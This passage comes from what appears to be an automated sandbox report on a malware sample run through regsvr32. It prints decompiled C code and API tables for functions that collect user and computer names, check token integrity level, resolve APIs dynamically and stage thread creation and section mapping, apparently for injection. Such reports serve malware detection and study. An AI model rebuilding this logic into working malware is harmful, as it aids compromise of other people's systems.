					}
				}
				return _t28;
			}













                                                  0x00c81b2f
                                                  0x00c81b37
                                                  0x00c81b3b
                                                  0x00c81b41
                                                  0x00c81b46
                                                  0x00c81b4b
                                                  0x00c81b4e
                                                  0x00c81b51
                                                  0x00c81b56
                                                  0x00c81b57
                                                  0x00c81b5a
                                                  0x00c81b5f
                                                  0x00c81b66
                                                  0x00c81b70
                                                  0x00c81b72
                                                  0x00c81b73
                                                  0x00c81b76
                                                  0x00c81b92
                                                  0x00c81b98
                                                  0x00c81b9c
                                                  0x00c81bea
                                                  0x00c81b9e
                                                  0x00c81bab
                                                  0x00c81bbb
                                                  0x00c81bc3
                                                  0x00c81bd5
                                                  0x00c81bd9
                                                  0x00000000
                                                  0x00000000
                                                  0x00c81bc5
                                                  0x00c81bc8
                                                  0x00c81bcd
                                                  0x00c81bcf
                                                  0x00c81bcf
                                                  0x00c81bad
                                                  0x00c81baf
                                                  0x00c81bdb
                                                  0x00c81bdc
                                                  0x00c81bdc
                                                  0x00c81bab
                                                  0x00c81bf1

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53,?,?), ref: 00C81B3B
                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00C81B51
                                                  • _snwprintf.NTDLL ref: 00C81B76
                                                  • CreateFileMappingW.KERNELBASE(000000FF,00C8D2A8,00000004,00000000,00001000,?), ref: 00C81B92
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53), ref: 00C81BA4
                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00C81BBB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?), ref: 00C81BDC
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00C822EA,?,?,4D283A53), ref: 00C81BE4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                  • String ID:
                                                  • API String ID: 1814172918-0
                                                  • Opcode ID: 545739b529a8db846c9b9c69f6df48cd3b050620d133aae2eddc13abc0981592
                                                  • Instruction ID: 354cab7cf75ed19642a9ea2f8e6d3925ce0e2ee68ac6dc8d59a23c908daada63
                                                  • Opcode Fuzzy Hash: 545739b529a8db846c9b9c69f6df48cd3b050620d133aae2eddc13abc0981592
                                                  • Instruction Fuzzy Hash: 762102B2600204BBD721BBA4DC45FAE37BCAB48754F250161FA15E71E0E770AE058B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8269C, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 183 c8269c-c826b0 184 c826ba-c826cc call c86b43 183->184 185 c826b2-c826b7 183->185 188 c826ce-c826de GetUserNameW 184->188 189 c82720-c8272d 184->189 185->184 190 c8272f-c82746 GetComputerNameW 188->190 191 c826e0-c826f0 RtlAllocateHeap 188->191 189->190 192 c82748-c82759 RtlAllocateHeap 190->192 193 c82784-c827a6 190->193 191->190 194 c826f2-c826ff GetUserNameW 191->194 192->193 195 c8275b-c82764 GetComputerNameW 192->195 196 c8270f-c8271e HeapFree 194->196 197 c82701-c8270d call c82496 194->197 198 c82775-c8277e HeapFree 195->198 199 c82766-c82772 call c82496 195->199 196->190 197->196 198->193 199->198
                                                  C-Code - Quality: 96%
                                                  			E00C8269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xc8d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00C86B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xc8d278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xc8d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E00C82496(_v8 + _v8, _t63);
							}
							HeapFree( *0xc8d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xc8d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E00C82496(_v8 + _v8, _t63);
						}
						HeapFree( *0xc8d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                  0x00c8269c
                                                  0x00c826a4
                                                  0x00c826aa
                                                  0x00c826ad
                                                  0x00c826b0
                                                  0x00c826b2
                                                  0x00c826b7
                                                  0x00c826b7
                                                  0x00c826bd
                                                  0x00c826bf
                                                  0x00c826cc
                                                  0x00c8272d
                                                  0x00c826ce
                                                  0x00c826d3
                                                  0x00c826d9
                                                  0x00c826de
                                                  0x00c826ec
                                                  0x00c826f0
                                                  0x00c826ff
                                                  0x00c82706
                                                  0x00c8270d
                                                  0x00c8270d
                                                  0x00c82718
                                                  0x00c82718
                                                  0x00c826f0
                                                  0x00c826de
                                                  0x00c8272f
                                                  0x00c82735
                                                  0x00c8273f
                                                  0x00c82741
                                                  0x00c82746
                                                  0x00c82755
                                                  0x00c82759
                                                  0x00c82764
                                                  0x00c8276b
                                                  0x00c82772
                                                  0x00c82772
                                                  0x00c8277e
                                                  0x00c8277e
                                                  0x00c82759
                                                  0x00c82787
                                                  0x00c82789
                                                  0x00c8278c
                                                  0x00c8278e
                                                  0x00c82791
                                                  0x00c82794
                                                  0x00c8279e
                                                  0x00c827a2
                                                  0x00c827a6

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C826D3
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 00C826EA
                                                  • GetUserNameW.ADVAPI32(00000000,?), ref: 00C826F7
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00C823D9), ref: 00C82718
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C8273F
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00C82753
                                                  • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00C82760
                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00C823D9), ref: 00C8277E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: HeapName$AllocateComputerFreeUser
                                                  • String ID:
                                                  • API String ID: 3239747167-0
                                                  • Opcode ID: 6d8f133ec185d6063c00c0a0e512c690213e90400cc895bb817d5b4a50f32eed
                                                  • Instruction ID: f4fbc0b1b3c0ba1adf2a967a7fa898de2e02175d7aaf112e4ce5006e0dca2265
                                                  • Opcode Fuzzy Hash: 6d8f133ec185d6063c00c0a0e512c690213e90400cc895bb817d5b4a50f32eed
                                                  • Instruction Fuzzy Hash: D1310771A00205EFDB15EF69DC85B6EB7F9EB48354F204029E406D7260EB30EE419B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8924F, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 216 c8924f-c8926a 217 c89309-c89315 216->217 218 c89270-c89289 OpenProcessToken 216->218 219 c89308 218->219 220 c8928b-c892b6 GetTokenInformation * 2 218->220 219->217 221 c892b8-c892c5 call c82049 220->221 222 c892fe-c89307 CloseHandle 220->222 225 c892fd 221->225 226 c892c7-c892d8 GetTokenInformation 221->226 222->219 225->222 227 c892da-c892f4 GetSidSubAuthorityCount GetSidSubAuthority 226->227 228 c892f7-c892f8 call c89039 226->228 227->228 228->225
                                                  C-Code - Quality: 100%
                                                  			E00C8924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xc8d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00C82049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00C89039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                                  0x00c8925c
                                                  0x00c89263
                                                  0x00c8926a
                                                  0x00c8927e
                                                  0x00c89289
                                                  0x00c892a1
                                                  0x00c892ae
                                                  0x00c892b1
                                                  0x00c892b6
                                                  0x00c892c1
                                                  0x00c892c5
                                                  0x00c892d4
                                                  0x00c892d8
                                                  0x00c892f4
                                                  0x00c892f4
                                                  0x00c892f8
                                                  0x00c892f8
                                                  0x00c892fd
                                                  0x00c89301
                                                  0x00c89307
                                                  0x00c89308
                                                  0x00c8930f
                                                  0x00c89315

                                                  APIs
                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00C89281
                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00C892A1
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00C892B1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C89301
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00C892D4
                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00C892DC
                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00C892EC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                  • String ID:
                                                  • API String ID: 1295030180-0
                                                  • Opcode ID: 3e6b3c900d8e7a757f597861c9123d9d8c0148f4924cd3a3eba1d7c5a5bacc1b
                                                  • Instruction ID: d2dd609e154c4d500f9e064a5233d0b0e411634fe228a590a8a27447e7d1a0db
                                                  • Opcode Fuzzy Hash: 3e6b3c900d8e7a757f597861c9123d9d8c0148f4924cd3a3eba1d7c5a5bacc1b
                                                  • Instruction Fuzzy Hash: E4213C7590021DFFEB11AF94DC84EFEBBB9EB48304F140065E911A61A1C7719F05EB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8163F, Relevance: 9.2, APIs: 6, Instructions: 152memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 230 c8163f-c8168b SysAllocString 231 c817af-c817b2 230->231 232 c81691-c816bd 230->232 233 c817bd-c817c0 231->233 234 c817b4-c817b7 SafeArrayDestroy 231->234 238 c817ac 232->238 239 c816c3-c816cf call c82436 232->239 236 c817cb-c817d2 233->236 237 c817c2-c817c5 SysFreeString 233->237 234->233 237->236 238->231 239->238 242 c816d5-c816e5 239->242 242->238 244 c816eb-c81711 IUnknown_QueryInterface_Proxy 242->244 244->238 246 c81717-c8172b 244->246 248 c81769-c8176c 246->248 249 c8172d-c81730 246->249 251 c8176e-c81773 248->251 252 c817a3-c817a8 248->252 249->248 250 c81732-c81749 StrStrIW 249->250 253 c8174b-c81754 call c852f9 250->253 254 c81760-c81763 SysFreeString 250->254 251->252 255 c81775-c81780 call c81a70 251->255 252->238 253->254 261 c81756-c8175e call c82436 253->261 254->248 258 c81785-c81789 255->258 258->252 260 c8178b-c81790 258->260 262 c8179e 260->262 263 c81792-c8179c 260->263 261->254 262->252 263->252
                                                  APIs
                                                  • SysAllocString.OLEAUT32(?), ref: 00C81680
                                                  • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 00C81702
                                                  • StrStrIW.SHLWAPI(?,006E0069), ref: 00C81741
                                                  • SysFreeString.OLEAUT32(?), ref: 00C81763
                                                    • Part of subcall function 00C852F9: SysAllocString.OLEAUT32(00C8C2B0), ref: 00C85349
                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 00C817B7
                                                  • SysFreeString.OLEAUT32(?), ref: 00C817C5
                                                    • Part of subcall function 00C82436: Sleep.KERNELBASE(000001F4), ref: 00C8247E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                                                  • String ID:
                                                  • API String ID: 2118684380-0
                                                  • Opcode ID: 13035416454bb859ea55a6a23a03e4b1463e9d26296e627dec391fc14545f66e
                                                  • Instruction ID: 8899200ed987aaa34069c185ee8031bfb795e7049927b70e35db32ef06fd0dd7
                                                  • Opcode Fuzzy Hash: 13035416454bb859ea55a6a23a03e4b1463e9d26296e627dec391fc14545f66e
                                                  • Instruction Fuzzy Hash: 92512375900209EFCB10EFE4C8849AEB7FAFF88344B19886DE915EB210D7719D46DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1A0F, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 266 5e1a0f-5e1a21 call 5e1de1 269 5e1a27-5e1a5c GetModuleHandleA GetProcAddress 266->269 270 5e1ae2 266->270 272 5e1a5e-5e1a72 GetProcAddress 269->272 273 5e1ada-5e1ae0 call 5e1dfc 269->273 271 5e1ae9-5e1af0 270->271 272->273 275 5e1a74-5e1a88 GetProcAddress 272->275 273->271 275->273 277 5e1a8a-5e1a9e GetProcAddress 275->277 277->273 278 5e1aa0-5e1ab4 GetProcAddress 277->278 278->273 279 5e1ab6-5e1ac7 call 5e1eb5 278->279 281 5e1acc-5e1ad1 279->281 281->273 282 5e1ad3-5e1ad8 281->282 282->271
                                                  C-Code - Quality: 100%
                                                  			E005E1A0F(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E005E1DE1(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x5e4150 + 0x5e5014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E005E1DFC(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x5e4150 + 0x5e5189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x5e4150 + 0x5e519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E005E1EB5(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                  0x005e1a1d
                                                  0x005e1a21
                                                  0x005e1ae2
                                                  0x005e1a27
                                                  0x005e1a3f
                                                  0x005e1a4e
                                                  0x005e1a55
                                                  0x005e1a59
                                                  0x005e1a5c
                                                  0x005e1ada
                                                  0x005e1adb
                                                  0x005e1a5e
                                                  0x005e1a6b
                                                  0x005e1a6f
                                                  0x005e1a72
                                                  0x00000000
                                                  0x005e1a74
                                                  0x005e1a81
                                                  0x005e1a85
                                                  0x005e1a88
                                                  0x00000000
                                                  0x005e1a8a
                                                  0x005e1a97
                                                  0x005e1a9b
                                                  0x005e1a9e
                                                  0x00000000
                                                  0x005e1aa0
                                                  0x005e1aad
                                                  0x005e1ab1
                                                  0x005e1ab4
                                                  0x00000000
                                                  0x005e1ab6
                                                  0x005e1abc
                                                  0x005e1ac2
                                                  0x005e1ac7
                                                  0x005e1ace
                                                  0x005e1ad1
                                                  0x00000000
                                                  0x005e1ad3
                                                  0x005e1ad6
                                                  0x005e1ad6
                                                  0x005e1ad1
                                                  0x005e1ab4
                                                  0x005e1a9e
                                                  0x005e1a88
                                                  0x005e1a72
                                                  0x005e1a5c
                                                  0x005e1af0

                                                  APIs
                                                    • Part of subcall function 005E1DE1: HeapAlloc.KERNEL32(00000000,?,005E1556,00000208,00000000,00000000,?,?,?,005E16A9,?), ref: 005E1DED
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,005E1E4D,?,?,?,?,?,00000002,?,005E1401), ref: 005E1A33
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A55
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A6B
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A81
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1A97
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 005E1AAD
                                                    • Part of subcall function 005E1EB5: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 005E1F12
                                                    • Part of subcall function 005E1EB5: memset.NTDLL ref: 005E1F34
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                  • String ID:
                                                  • API String ID: 1632424568-0
                                                  • Opcode ID: 970e19efa35405d1462042481b37e74a35f72127670da5066b7c641d0411be37
                                                  • Instruction ID: 06d684121b9be5d25b474900287be389bf3857e98071023829dde1cbcbd274b1
                                                  • Opcode Fuzzy Hash: 970e19efa35405d1462042481b37e74a35f72127670da5066b7c641d0411be37
                                                  • Instruction Fuzzy Hash: 8B214DB1601A8A9FCB18DFAADC88E6A7BECFF143447004465E8C5CB211E734E905DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 005E1AFA, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 5e1afa-5e1b0e 284 5e1b7f-5e1b8c InterlockedDecrement 283->284 285 5e1b10-5e1b11 283->285 286 5e1b8e-5e1b94 284->286 287 5e1bcc-5e1bd3 284->287 285->287 288 5e1b17-5e1b24 InterlockedIncrement 285->288 289 5e1b96 286->289 290 5e1bc0-5e1bc6 HeapDestroy 286->290 288->287 291 5e1b2a-5e1b3e HeapCreate 288->291 294 5e1b9b-5e1bab SleepEx 289->294 290->287 292 5e1b7a-5e1b7d 291->292 293 5e1b40-5e1b71 call 5e15ee call 5e12dc 291->293 292->287 293->287 301 5e1b73-5e1b76 293->301 296 5e1bad-5e1bb2 294->296 297 5e1bb4-5e1bba CloseHandle 294->297 296->294 296->297 297->290 301->292
                                                  C-Code - Quality: 86%
                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x5e4108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x5e410c;
						if( *0x5e410c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x5e4118;
								if( *0x5e4118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x5e410c);
						}
						HeapDestroy( *0x5e4110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x5e4108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x5e4110 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x5e4130 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E005E12DC(E005E111A, E005E15EE(_a12, 1, 0x5e4118, _t41));
							 *0x5e410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                  0x005e1afd
                                                  0x005e1b09
                                                  0x005e1b0b
                                                  0x005e1b0e
                                                  0x005e1b84
                                                  0x005e1b8a
                                                  0x005e1b8c
                                                  0x005e1b8e
                                                  0x005e1b94
                                                  0x005e1b96
                                                  0x005e1b9b
                                                  0x005e1b9e
                                                  0x005e1ba9
                                                  0x005e1bab
                                                  0x00000000
                                                  0x00000000
                                                  0x005e1bad
                                                  0x005e1bb0
                                                  0x005e1bb2
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x005e1bb2
                                                  0x005e1bba
                                                  0x005e1bba
                                                  0x005e1bc6
                                                  0x005e1bc6
                                                  0x005e1b10
                                                  0x005e1b11
                                                  0x005e1b31
                                                  0x005e1b37
                                                  0x005e1b39
                                                  0x005e1b3e
                                                  0x005e1b7a
                                                  0x005e1b7a
                                                  0x005e1b40
                                                  0x005e1b48
                                                  0x005e1b4f
                                                  0x005e1b59
                                                  0x005e1b65
                                                  0x005e1b6c
                                                  0x005e1b71
                                                  0x005e1b76
                                                  0x00000000
                                                  0x005e1b76
                                                  0x005e1b71
                                                  0x005e1b3e
                                                  0x005e1b11
                                                  0x005e1bd3

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(005E4108), ref: 005E1B1C
                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 005E1B31
                                                    • Part of subcall function 005E12DC: CreateThread.KERNEL32 ref: 005E12F3
                                                    • Part of subcall function 005E12DC: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 005E1308
                                                    • Part of subcall function 005E12DC: GetLastError.KERNEL32(00000000), ref: 005E1313
                                                    • Part of subcall function 005E12DC: TerminateThread.KERNEL32(00000000,00000000), ref: 005E131D
                                                    • Part of subcall function 005E12DC: CloseHandle.KERNEL32(00000000), ref: 005E1324
                                                    • Part of subcall function 005E12DC: SetLastError.KERNEL32(00000000), ref: 005E132D
                                                  • InterlockedDecrement.KERNEL32(005E4108), ref: 005E1B84
                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 005E1B9E
                                                  • CloseHandle.KERNEL32 ref: 005E1BBA
                                                  • HeapDestroy.KERNEL32 ref: 005E1BC6
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                  • String ID:
                                                  • API String ID: 2110400756-0
                                                  • Opcode ID: 5c04d9e8ecd5cd0edec8132d36de1a679b26edf15f1db80cc98802215abc8216
                                                  • Instruction ID: 2a22bc07c95360f79bb872d0c20d4b2d0b2bb9e944f96c13050ff4eac134f7e6
                                                  • Opcode Fuzzy Hash: 5c04d9e8ecd5cd0edec8132d36de1a679b26edf15f1db80cc98802215abc8216
                                                  • Instruction Fuzzy Hash: F121AE31A006C5ABCB1C9F6AECC9A297FA8FB703607544129F5C5DB150E7308E48DF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C86A56, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 74%
                                                  			E00C86A56(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xc8d238 = _t10;
				if(_t10 != 0) {
					 *0xc8d1a8 = GetTickCount();
					_t12 = E00C88F10(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00C8B226();
							_t33 = _t14 + _t16;
							_t18 = E00C87E03(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00C86B96(_t25) != 0) {
							 *0xc8d260 = 1; // executed
						}
						_t12 = E00C8225B(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                  0x00c86a56
                                                  0x00c86a5c
                                                  0x00c86a5d
                                                  0x00c86a69
                                                  0x00c86a71
                                                  0x00c86a76
                                                  0x00c86a86
                                                  0x00c86a8b
                                                  0x00c86a92
                                                  0x00c86a94
